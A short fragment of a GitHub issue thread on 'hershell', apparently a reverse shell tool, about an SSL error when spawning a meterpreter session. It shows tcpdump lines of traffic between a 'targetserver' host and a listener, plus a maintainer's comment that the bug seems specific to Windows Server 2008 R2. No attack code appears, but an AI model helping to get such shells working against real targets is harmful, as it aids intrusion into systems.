Flags [P.], cksum 0x1281 (incorrect -> 0x9b15), seq 179784:180355, ack 2, win 229, length 571 02:26:50.641341 IP (tos 0x0, ttl 128, id 30106, offset 0, flags [DF], proto TCP (6), length 40) targetserver.xxx.corp.59517 > 192.168.71.120.tproxy: Flags [R.], cksum 0xcd76 (correct), seq 2, ack 180355, win 0, length 0

lesnuages commented 5 years ago

Gotta get my hands on a Windows Server 2008 R2 iso before going further, the issue seems to be OS specific.

lesnuages / hershell

SSL Error when spawning meterpreter #3